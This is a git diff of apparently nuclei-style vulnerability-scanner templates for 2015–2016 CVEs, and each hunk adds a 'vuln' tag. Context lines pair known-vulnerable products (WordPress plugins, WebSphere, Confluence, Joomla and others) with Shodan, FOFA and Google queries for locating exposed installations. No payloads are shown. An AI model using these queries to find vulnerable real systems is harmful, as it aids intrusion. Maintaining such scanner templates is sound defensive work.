cve,cve2015,wordpress,wp-plugin,xss,packetstorm,genetechsolutions,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 21a96361a22..a4ae1796183 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -31,7 +31,7 @@ info: - http.html:"IBM WebSphere Portal" - http.html:"ibm websphere portal" fofa-query: body="ibm websphere portal" - tags: cve2015,cve,websphere,deserialization,rce,oast,ibm,java,kev,vkev + tags: cve2015,cve,websphere,deserialization,rce,oast,ibm,java,kev,vkev,vuln http: - raw: diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index ad72d308a20..c97b94c179d 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"opmanager plus" fofa-query: title="opmanager plus" google-query: intitle:"opmanager plus" - tags: cve2015,cve,manageengine,edb,lfi,zohocorp + tags: cve2015,cve,manageengine,edb,lfi,zohocorp,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index a714965feb8..42994736591 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -31,7 +31,7 @@ info: - http.title:"kentico database setup" fofa-query: title="kentico database setup" google-query: intitle:"kentico database setup" - tags: cve2015,cve,kentico,redirect,packetstorm + tags: cve2015,cve,kentico,redirect,packetstorm,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index 5d112c20980..99c4d055c0b 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: gameconnect product: sourcebans - tags: cve2015,cve,xss,sourcebans,gameconnect + tags: cve2015,cve,xss,sourcebans,gameconnect,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index 3e7e0bb3648..6f4817d48fa 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -29,7 +29,7 @@ info: - http.component:"Atlassian Confluence" - cpe:"cpe:2.3:a:atlassian:confluence" - http.component:"atlassian confluence" - tags: cve2015,cve,edb,atlassian,confluence + tags: cve2015,cve,edb,atlassian,confluence,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-8562.yaml b/http/cves/2015/CVE-2015-8562.yaml index 8e6a1fb3f14..219a45526d2 100644 --- a/http/cves/2015/CVE-2015-8562.yaml +++ b/http/cves/2015/CVE-2015-8562.yaml @@ -24,7 +24,7 @@ info: - http.component:"joomla" - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" - tags: cve,cve2015,joomla,rce,unauth,vkev + tags: cve,cve2015,joomla,rce,unauth,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index ae9f9c34a29..571dec5f5e5 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: umbraco product: umbraco - tags: cve2015,cve,ssrf,oast,umbraco,vkev + tags: cve2015,cve,ssrf,oast,umbraco,vkev,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index 4d9b03ed1b7..2cfe7d9fbe5 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -29,7 +29,7 @@ info: vendor: newstatpress_project product: newstatpress framework: wordpress - tags: cve2015,cve,xss,authenticated,wp,newstatpress,wpscan,wordpress,wp-plugin,newstatpress_project + tags: cve2015,cve,xss,authenticated,wp,newstatpress,wpscan,wordpress,wp-plugin,newstatpress_project,vuln http: - raw: diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml index 605aee1b79d..d4db023cc56 100644 --- a/http/cves/2015/CVE-2015-9323.yaml +++ b/http/cves/2015/CVE-2015-9323.yaml @@ -29,7 +29,7 @@ info: vendor: duckdev product: 404_to_301 framework: wordpress - tags: time-based-sqli,cve2015,cve,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated,duckdev + tags: time-based-sqli,cve2015,cve,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated,duckdev,vuln http: - raw: diff --git a/http/cves/2015/CVE-2015-9406.yaml b/http/cves/2015/CVE-2015-9406.yaml index 91ef6762ff7..aa5b92ed8a2 100644 --- a/http/cves/2015/CVE-2015-9406.yaml +++ b/http/cves/2015/CVE-2015-9406.yaml @@ -26,7 +26,7 @@ info: product: mtheme-unus framework: wordpress fofa-query: 'body="wp-content/themes/mTheme-Unus/"' - tags: cve,cve2015,wordpress,wp-theme,wp,wpscan,mtheme-unus,lfi,vkev + tags: cve,cve2015,wordpress,wp-theme,wp,wpscan,mtheme-unus,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index a01b14ac8be..7d50c81e833 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -29,7 +29,7 @@ info: product: "wp-symposium" framework: wordpress google-query: "inurl:\"/wp-content/plugins/wp-symposium\"" - tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro + tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2015/CVE-2015-9415.yaml b/http/cves/2015/CVE-2015-9415.yaml index d5ad8fc74d6..2cd2a00b34c 100644 --- a/http/cves/2015/CVE-2015-9415.yaml +++ b/http/cves/2015/CVE-2015-9415.yaml @@ -26,7 +26,7 @@ info: product: bj_lazy_load framework: wordpress fofa-query: body="/wp-content/plugins/bj-lazy-load" - tags: cve,cve2015,wp,wp-plugin,wordpress,wpscan,bj-lazy-load,rfi,vkev + tags: cve,cve2015,wp,wp-plugin,wordpress,wpscan,bj-lazy-load,rfi,vkev,vuln flow: http(1) || http(2) diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index fb666e3c9bd..b302a788fda 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml @@ -27,7 +27,7 @@ info: product: robotcpa framework: wordpress google-query: inurl:"/wp-content/plugins/robotcpa" - tags: cve2015,cve,wp-plugin,lfi,edb,wordpress,robot-cpa + tags: cve2015,cve,wp-plugin,lfi,edb,wordpress,robot-cpa,vuln http: - method: GET diff --git a/http/cves/2015/CVE-2015-9499.yaml b/http/cves/2015/CVE-2015-9499.yaml index ff77d12d402..405e84a6b1e 100644 --- a/http/cves/2015/CVE-2015-9499.yaml +++ b/http/cves/2015/CVE-2015-9499.yaml @@ -24,7 +24,7 @@ info: vendor: themepunch product: showbiz_pro framework: wordpress - tags: cve,cve2015,wpscan,packetstorm,wp,wordpress,wp-plugin,showbiz,uplo,intrusive,vkev + tags: cve,cve2015,wpscan,packetstorm,wp,wordpress,wp-plugin,showbiz,uplo,intrusive,vkev,vuln variables: marker: "{{randstr}}" diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index 03248046cd8..4423b4e65a6 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -29,7 +29,7 @@ info: shodan-query: - http.component:"Adobe Experience Manager" - http.component:"adobe experience manager" - tags: cve2016,cve,adobe,aem + tags: cve2016,cve,adobe,aem,vuln http: - method: GET diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index e2ec33d390f..2083b4127d8 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -29,7 +29,7 @@ info: product: "admin-font-editor" framework: wordpress google-query: "inurl:\"/wp-content/plugins/admin-font-editor\"" - tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project + tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 95c537e4865..73face016da 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -27,7 +27,7 @@ info: vendor: "ajax-random-post_project" product: "ajax-random-post" framework: wordpress - tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project + tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml index 71d2f14dfe8..88009babe5f 100644 --- a/http/cves/2016/CVE-2016-1000128.yaml +++ b/http/cves/2016/CVE-2016-1000128.yaml @@ -25,7 +25,7 @@ info: product: "anti-plagiarism" framework: wordpress google-query: "inurl:\"/wp-content/plugins/anti-plagiarism\"" - tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project + tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index d82b9fa3887..a7e7c841767 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -29,7 +29,7 @@ info: product: "defa-online-image-protector" framework: wordpress google-query: "inurl:\"/wp-content/plugins/defa-online-image-protector\"" - tags: cve2016,cve,wordpress,xss,wp-plugin,defa-online-image-protector_project + tags: cve2016,cve,wordpress,xss,wp-plugin,defa-online-image-protector_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index 59b71427661..4be766156a5 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -27,7 +27,7 @@ info: product: "e-search" framework: wordpress google-query: "inurl:\"/wp-content/plugins/e-search\"" - tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project + tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index c84df8080d3..67ca31c4e94 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -28,7 +28,7 @@ info: product: esearch framework: wordpress google-query: "inurl:\"/wp-content/plugins/e-search\"" - tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project + tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index a29af42c967..3935bce7be3 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -29,7 +29,7 @@ info: product: "tooltip_glossary" framework: wordpress google-query: "inurl:\"/wp-content/plugins/enhanced-tooltipglossary\"" - tags: cve2016,cve,wordpress,xss,wp-plugin,cminds + tags: cve2016,cve,wordpress,xss,wp-plugin,cminds,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index 9e9cb3907bb..9d680d64a0b 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -28,7 +28,7 @@ info: product: "forget_about_shortcode_buttons" framework: wordpress google-query: "inurl:\"/wp-content/plugins/forget-about-shortcode-buttons\"" - tags: cve2016,cve,wordpress,xss,wp-plugin,designsandcode + tags: cve2016,cve,wordpress,xss,wp-plugin,designsandcode,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index d4073f73c91..7f4260b60a6 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -28,7 +28,7 @@ info: product: "hdw-tube" framework: wordpress google-query: "inurl:\"/wp-content/plugins/hdw-tube\"" - tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project + tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index 9fdb44b1b42..2b0fe11583c 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -28,7 +28,7 @@ info: product: "hdw-tube" framework: wordpress google-query: "inurl:\"/wp-content/plugins/hdw-tube\"" - tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project + tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml index df966dba694..7a9e0e38d2d 100644 --- a/http/cves/2016/CVE-2016-1000136.yaml +++ b/http/cves/2016/CVE-2016-1000136.yaml @@ -26,7 +26,7 @@ info: product: "heat-trackr" framework: wordpress google-query: "inurl:\"/wp-content/plugins/heat-trackr\"" - tags: cve2016,cve,wordpress,xss,wp-plugin,heat-trackr_project + tags: cve2016,cve,wordpress,xss,wp-plugin,heat-trackr_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 601451f98d3..2c2bb53cf0f 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -28,7 +28,7 @@ info: vendor: "hero-maps-pro_project" product: "hero-maps-pro" framework: wordpress - tags: cve2016,cve,wordpress,xss,wp-plugin,maps,hero-maps-pro_project + tags: cve2016,cve,wordpress,xss,wp-plugin,maps,hero-maps-pro_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index d28adf6e793..3a8807b68a1 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -29,7 +29,7 @@ info: product: indexisto framework: wordpress google-query: "inurl:\"/wp-content/plugins/indexisto\"" - tags: cve,cve2016,wordpress,xss,wp-plugin,indexisto_project + tags: cve,cve2016,wordpress,xss,wp-plugin,indexisto_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index 190ae5fe6e3..ad8990af6ee 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml +++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -29,7 +29,7 @@ info: product: infusionsoft framework: wordpress google-query: "inurl:\"/wp-content/plugins/infusionsoft\"" - tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,infusionsoft_project + tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,infusionsoft_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index bf2ca8f3c38..31b62027293 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -28,7 +28,7 @@ info: vendor: "new-year-firework_project" product: "new-year-firework" framework: wordpress - tags: cve2016,cve,wordpress,xss,wp-plugin,new-year-firework_project + tags: cve2016,cve,wordpress,xss,wp-plugin,new-year-firework_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index 5bbb21bb0ce..ca478cc6afb 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -27,7 +27,7 @@ info: product: "page-layout-builder" framework: wordpress google-query: "inurl:\"/wp-content/plugins/page-layout-builder\"" - tags: cve,cve2016,wordpress,xss,wp-plugin,page-layout-builder_project + tags: cve,cve2016,wordpress,xss,wp-plugin,page-layout-builder_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index b54047a5681..6593460f732 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -28,7 +28,7 @@ info: vendor: "parsi-font_project" product: "parsi-font" framework: wordpress - tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,parsi-font_project + tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,parsi-font_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index 2308efcdefb..10700c3a791 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -28,7 +28,7 @@ info: vendor: "photoxhibit_project" product: photoxhibit framework: wordpress - tags: cve2016,cve,wordpress,wp-plugin,xss,photoxhibit_project + tags: cve2016,cve,wordpress,wp-plugin,xss,photoxhibit_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index 392f7d4a81c..eca96bd5f2f 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -26,7 +26,7 @@ info: vendor: "pondol-formmail_project" product: "pondol-formmail" framework: wordpress - tags: cve2016,cve,wordpress,xss,wp-plugin,mail,pondol-formmail_project + tags: cve2016,cve,wordpress,xss,wp-plugin,mail,pondol-formmail_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index f8ff17a1d90..e99bfdf234f 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -28,7 +28,7 @@ info: vendor: "s3-video_project" product: "s3-video" framework: wordpress - tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,s3-video_project + tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,s3-video_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index 0c521493cab..76416236311 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -28,7 +28,7 @@ info: vendor: "simpel-reserveren_project" product: "simpel-reserveren" framework: wordpress - tags: cve2016,cve,wordpress,xss,wp-plugin,simpel-reserveren_project,vkev + tags: cve2016,cve,wordpress,xss,wp-plugin,simpel-reserveren_project,vkev,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index 7478fd6fe7f..a05f6e8ca01 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml @@ -26,7 +26,7 @@ info: vendor: "tidio-form_project" product: "tidio-form" framework: wordpress - tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-form_project + tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-form_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index fad3e287452..42bfc9567fa 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -28,7 +28,7 @@ info: vendor: "tidio-gallery_project" product: "tidio-gallery" framework: wordpress - tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-gallery_project + tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-gallery_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index daae4714217..246a4188f1c 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -27,7 +27,7 @@ info: vendor: browserweb product: whizz framework: wordpress - tags: cve2016,cve,wordpress,xss,wp-plugin,browserweb + tags: cve2016,cve,wordpress,xss,wp-plugin,browserweb,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index fc149cf5e05..e6559d4068f 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -26,7 +26,7 @@ info: vendor: wpsolr product: "wpsolr-search-engine" framework: wordpress - tags: cve2016,cve,wordpress,xss,wp-plugin,wpsolr + tags: cve2016,cve,wordpress,xss,wp-plugin,wpsolr,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index 91bfa807dbd..856b05e9de2 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: phpmailer_project product: phpmailer - tags: cve,cve2016,seclists,rce,edb,wordpress,phpmailer_project,kev,vkev + tags: cve,cve2016,seclists,rce,edb,wordpress,phpmailer_project,kev,vkev,vuln http: - raw: diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index eb2aa9a3458..69beea86c7c 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -29,7 +29,7 @@ info: product: mycloud_nas shodan-query: http.favicon.hash:-1074357885 fofa-query: icon_hash=-1074357885 - tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital,vkev + tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital,vkev,vuln http: - raw: diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index 9354cc297f9..4e4aeb60511 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -36,7 +36,7 @@ info: - app="zabbix-监控系统" && body="saml" - title="zabbix-server" google-query: intitle:"zabbix-server" - tags: cve2016,cve,zabbix,sqli,vulhub + tags: cve2016,cve,zabbix,sqli,vulhub,vuln http: - method: GET diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index 3649ec6815a..2590d049c76 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -33,7 +33,7 @@ info: - http.title:"opsview" fofa-query: title="opsview" google-query: intitle:"opsview" - tags: cve2016,cve,opsview,lfi,vkev + tags: cve2016,cve,opsview,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index 3514fa3026f..16e1e4b2078 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.title:"opsview" fofa-query: title="opsview" google-query: intitle:"opsview" - tags: cve2016,cve,redirect,opsview,authenticated + tags: cve2016,cve,redirect,opsview,authenticated,vuln http: - raw: diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index 3464514cf32..3a122c99018 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml @@ -30,7 +30,7 @@ info: product: zedna_ebook_download framework: wordpress google-query: inurl:"/wp-content/plugins/ebook-download" - tags: cve2016,cve,wordpress,edb,wp-plugin,lfi,ebook,wp,wpscan,zedna_ebook_download_project,vkev + tags: cve2016,cve,wordpress,edb,wp-plugin,lfi,ebook,wp,wpscan,zedna_ebook_download_project,vkev,vuln http: - method: GET diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml index ff24bd04480..860c415ed3f 100644 --- a/http/cves/2016/CVE-2016-10940.yaml +++ b/http/cves/2016/CVE-2016-10940.yaml @@ -28,7 +28,7 @@ info: vendor: zm-gallery_project product: zm-gallery framework: wordpress - tags: cve,cve2016,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,zm-gallery_project + tags: cve,cve2016,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,zm-gallery_project,vuln http: - raw: diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index 0db0823feab..7a42622aa5a 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -29,7 +29,7 @@ info: product: mail-masta framework: wordpress google-query: inurl:"/wp-content/plugins/mail-masta" - tags: cve,cve2016,wordpress,wp-plugin,lfi,mail,mail-masta_project + tags: cve,cve2016,wordpress,wp-plugin,lfi,mail,mail-masta_project,vuln http: - method: GET diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index 89309c5300a..8272ee85a17 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -29,7 +29,7 @@ info: product: wsecure framework: wordpress google-query: inurl:"/wp-content/plugins/wsecure" - tags: cve2016,cve,wordpress,wp-plugin,rce,joomlaserviceprovider,vkev + tags: cve2016,cve,wordpress,wp-plugin,rce,joomlaserviceprovider,vkev,vuln variables: name: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2016/CVE-2016-10972.yaml b/http/cves/2016/CVE-2016-10972.yaml index 0ec8b55c1b3..f42b614034e 100644 --- a/http/cves/2016/CVE-2016-10972.yaml +++ b/http/cves/2016/CVE-2016-10972.yaml @@ -21,7 +21,7 @@ info: vendor: tagdiv product: newspaper framework: wordpress - tags: wpscan,cve,cve2016,wp,wordpress,wpscan,wp-theme,newspaper,passive,vkev + tags: wpscan,cve,cve2016,wp,wordpress,wpscan,wp-theme,newspaper,passive,vkev,vuln http: - method: GET diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index 04a73bca0dd..7bbb56de8bd 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -28,7 +28,7 @@ info: vendor: brafton product: brafton framework: wordpress - tags: cve2016,cve,wpscan,wordpress,wp,wp-plugin,xss,brafton,authenticated + tags: cve2016,cve,wpscan,wordpress,wp,wp-plugin,xss,brafton,authenticated,vuln http: - raw: diff --git a/http/cves/2016/CVE-2016-10976.yaml b/http/cves/2016/CVE-2016-10976.yaml index 262013aa9ad..d84e7987c9d 100644 --- a/http/cves/2016/CVE-2016-10976.yaml +++ b/http/cves/2016/CVE-2016-10976.yaml @@ -25,7 +25,7 @@ info: vendor: kodebyraaet product: safe_editor framework: wordpress - tags: cve,cve2016,wordpress,wp,wp-plugin,xss,safe_editor + tags: cve,cve2016,wordpress,wp,wp-plugin,xss,safe_editor,vuln flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 56dc17f5051..e6a953b7e76 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: "scoreme_project" product: scoreme - tags: cve2016,cve,wordpress,wp-theme,xss,scoreme_project + tags: cve2016,cve,wordpress,wp-theme,xss,scoreme_project,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-15042.yaml b/http/cves/2016/CVE-2016-15042.yaml index 9c7f789b596..654c42ce294 100644 --- a/http/cves/2016/CVE-2016-15042.yaml +++ b/http/cves/2016/CVE-2016-15042.yaml @@ -26,7 +26,7 @@ info: vendor: najeebmedia product: frontend_file_manager framework: wordpress - tags: cve,cve2016,wordpress,wp-plugin,n-media,post-frontend,intrusive,unauth,file-upload,vkev + tags: cve,cve2016,wordpress,wp-plugin,n-media,post-frontend,intrusive,unauth,file-upload,vkev,vuln variables: randstr_name: "{{randstr}}" diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index c3de43706e7..429ef42a609 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: netgear product: wnap320_firmware - tags: cve2016,cve,seclists,packetstorm,netgear,rce,oast,router,kev,vkev + tags: cve2016,cve,seclists,packetstorm,netgear,rce,oast,router,kev,vkev,vuln http: - raw: diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index f3799446e64..3526c973471 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -31,7 +31,7 @@ info: - http.favicon.hash:-266008933 - cpe:"cpe:2.3:a:sap:netweaver" fofa-query: icon_hash=-266008933 